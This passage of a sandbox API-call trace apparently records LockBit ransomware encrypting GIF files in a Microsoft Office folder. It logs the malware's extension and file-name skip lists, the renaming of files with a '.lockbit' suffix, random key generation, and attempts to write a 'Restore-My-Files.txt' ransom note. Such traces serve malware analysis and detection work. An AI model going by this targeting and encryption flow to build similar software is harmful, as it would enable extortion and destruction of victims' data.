(lpString1=".7z", lpString2=".GIF") returned -1 [0202.964] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0202.964] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0202.964] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0202.964] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0202.964] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0202.964] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0202.964] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0202.964] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0202.964] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0202.964] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0202.964] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0202.964] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0202.964] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0202.964] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0202.964] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0202.964] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0202.965] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0202.965] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0202.965] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0202.965] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0202.965] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0202.965] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0202.965] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0202.965] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0202.965] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0202.965] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10266_.GIF.lockbit") returned 78 [0202.965] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10266_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10266_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.966] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.966] malloc (_Size=0x40068) returned 0x3df0008 [0202.966] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=177) returned 1 [0202.966] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.966] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.966] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.966] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.967] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.967] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.970] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10266_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10266_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.970] malloc (_Size=0xb2) returned 0x1fa2ed8 [0202.970] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0202.970] free (_Block=0x1fa2ed8) [0202.970] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10266_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0202.970] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0202.970] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.970] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe23cb800, ftCreationTime.dwHighDateTime=0x1bd8f8e, ftLastAccessTime.dwLowDateTime=0xbc86dac0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe23cb800, ftLastWriteTime.dwHighDateTime=0x1bd8f8e, nFileSizeHigh=0x0, nFileSizeLow=0x137, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10267_.GIF", cAlternateFileName="")) returned 1 [0202.970] lstrcmpiW (lpString1=".", lpString2="BD10267_.GIF") returned -1 [0202.970] lstrcmpiW (lpString1="..", lpString2="BD10267_.GIF") returned -1 [0202.971] PathFindExtensionW (pszPath="BD10267_.GIF") returned=".GIF" [0202.971] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0202.971] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0202.971] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0202.971] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0202.971] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0202.971] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0202.971] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0202.971] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0202.971] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0202.971] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0202.971] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0202.971] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0202.971] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0202.971] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0202.971] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0202.971] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0202.971] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0202.971] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0202.971] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0202.971] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0202.971] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0202.971] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0202.971] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0202.971] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0202.971] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.971] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0202.971] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0202.971] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0202.971] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0202.971] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0202.971] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0202.971] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0202.972] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0202.972] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0202.972] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0202.972] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0202.972] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0202.972] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0202.972] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0202.972] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0202.972] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0202.972] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0202.972] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.972] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0202.972] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0202.972] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0202.972] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0202.972] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10267_.GIF") returned 1 [0202.972] lstrcmpiW (lpString1="ntldr", lpString2="BD10267_.GIF") returned 1 [0202.972] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10267_.GIF") returned 1 [0202.972] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10267_.GIF") returned 1 [0202.972] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10267_.GIF") returned -1 [0202.972] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10267_.GIF") returned 1 [0202.972] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10267_.GIF") returned 1 [0202.972] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0202.972] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10267_.GIF") returned=".GIF" [0202.972] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0202.972] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0202.972] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0202.972] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0202.972] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0202.972] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0202.972] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0202.972] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0202.972] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0202.972] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0202.972] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0202.973] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0202.973] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0202.973] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0202.973] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0202.973] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0202.973] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0202.973] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0202.973] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0202.973] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0202.973] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0202.973] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0202.973] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0202.973] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0202.973] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0202.973] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0202.973] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0202.973] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0202.973] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10267_.GIF.lockbit") returned 78 [0202.973] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10267_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10267_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.974] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.974] malloc (_Size=0x40068) returned 0x3df0008 [0202.974] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=311) returned 1 [0202.974] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.975] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.975] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.975] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.975] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.979] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10267_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10267_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.979] malloc (_Size=0xb2) returned 0x1fa2ed8 [0202.979] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0202.979] free (_Block=0x1fa2ed8) [0202.979] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10267_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0202.979] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0202.979] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.979] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe23cb800, ftCreationTime.dwHighDateTime=0x1bd8f8e, ftLastAccessTime.dwLowDateTime=0xbc86dac0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe23cb800, ftLastWriteTime.dwHighDateTime=0x1bd8f8e, nFileSizeHigh=0x0, nFileSizeLow=0xb1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10268_.GIF", cAlternateFileName="")) returned 1 [0202.979] lstrcmpiW (lpString1=".", lpString2="BD10268_.GIF") returned -1 [0202.979] lstrcmpiW (lpString1="..", lpString2="BD10268_.GIF") returned -1 [0202.979] PathFindExtensionW (pszPath="BD10268_.GIF") returned=".GIF" [0202.979] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0202.979] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0202.979] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0202.979] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0202.979] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0202.979] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0202.979] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0202.979] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0202.979] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0202.979] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0202.979] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0202.979] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0202.979] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0202.980] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0202.980] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0202.980] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0202.980] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0202.980] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0202.980] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0202.980] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0202.981] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10268_.GIF") returned 1 [0202.981] lstrcmpiW (lpString1="ntldr", lpString2="BD10268_.GIF") returned 1 [0202.981] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10268_.GIF") returned 1 [0202.981] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10268_.GIF") returned 1 [0202.981] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10268_.GIF") returned -1 [0202.981] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10268_.GIF") returned 1 [0202.981] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10268_.GIF") returned 1 [0202.981] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0202.981] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10268_.GIF") returned=".GIF" [0202.981] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0202.981] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0202.981] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0202.981] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0202.981] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0202.981] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0202.981] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0202.981] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0202.981] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0202.981] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0202.981] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0202.981] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0202.981] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0202.981] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0202.981] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0202.981] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0202.981] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0202.981] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0202.981] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0202.981] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0202.981] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0202.981] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0202.981] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0202.982] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0202.982] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0202.982] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0202.982] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0202.982] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0202.982] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10268_.GIF.lockbit") returned 78 [0202.982] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10268_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10268_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.983] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.983] malloc (_Size=0x40068) returned 0x3df0008 [0202.983] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=177) returned 1 [0202.983] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.984] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.984] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.984] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.984] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.988] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10268_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10268_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.988] malloc (_Size=0xb2) returned 0x1fa2ed8 [0202.988] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0202.988] free (_Block=0x1fa2ed8) [0202.988] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10268_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0202.988] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0202.988] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.988] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70656e00, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc893c20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x70656e00, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0x46b, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10297_.GIF", cAlternateFileName="")) returned 1 [0202.988] lstrcmpiW (lpString1=".", lpString2="BD10297_.GIF") returned -1 [0202.988] lstrcmpiW (lpString1="..", lpString2="BD10297_.GIF") returned -1 [0202.988] PathFindExtensionW (pszPath="BD10297_.GIF") returned=".GIF" [0202.988] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0202.988] lstrcmpiW 